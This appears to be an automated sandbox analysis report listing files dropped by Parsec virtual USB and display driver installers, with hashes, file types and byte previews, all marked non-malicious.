                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                            C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET614C.tmp

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                            C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.cat (copy)

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                            C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf (copy)

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                            C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.sys (copy)

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                            C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8A7D.tmp

                            Download File
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11928
                            Entropy (8bit):7.349994571032463
                            Encrypted:false
                            SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                            MD5:1FE1FC7CC73FB17E995D65835D51CA94
                            SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                            SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                            SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......

                            C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8ABC.tmp

                            Download File
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):173736
                            Entropy (8bit):6.232270251717221
                            Encrypted:false
                            SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                            MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                            SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                            SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                            SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................

                            C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8ADC.tmp

                            Download File
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):4122
                            Entropy (8bit):3.7080252993527285
                            Encrypted:false
                            SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                            MD5:D8030AFE09A2F984BE00389B31F7039B
                            SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                            SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                            SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                            Malicious:false
                            Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.

                            C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.cat (copy)

                            Download File
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11928
                            Entropy (8bit):7.349994571032463
                            Encrypted:false
                            SSDEEP:192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
                            MD5:1FE1FC7CC73FB17E995D65835D51CA94
                            SHA1:249ACF0A3A362B2163127BD76F6D4D6AA463297D
                            SHA-256:136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
                            SHA-512:31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......

                            C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.dll (copy)

                            Download File
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):173736
                            Entropy (8bit):6.232270251717221
                            Encrypted:false
                            SSDEEP:3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
                            MD5:F09967CC8CC9BF03612DDECB6BF86DAA
                            SHA1:166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
                            SHA-256:96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
                            SHA-512:190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................

                            C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.inf (copy)

                            Download File
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):4122
                            Entropy (8bit):3.7080252993527285
                            Encrypted:false
                            SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                            MD5:D8030AFE09A2F984BE00389B31F7039B
                            SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                            SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                            SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                            Malicious:false
                            Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.

                            C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET700F.tmp

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                            C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET7020.tmp

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                            C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET7030.tmp

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):26680
                            Entropy (8bit):6.39482709996269
                            Encrypted:false
                            SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                            MD5:0790B2E5B9D6B38B566C6BC796F0364A
                            SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                            SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                            SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.cat (copy)

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
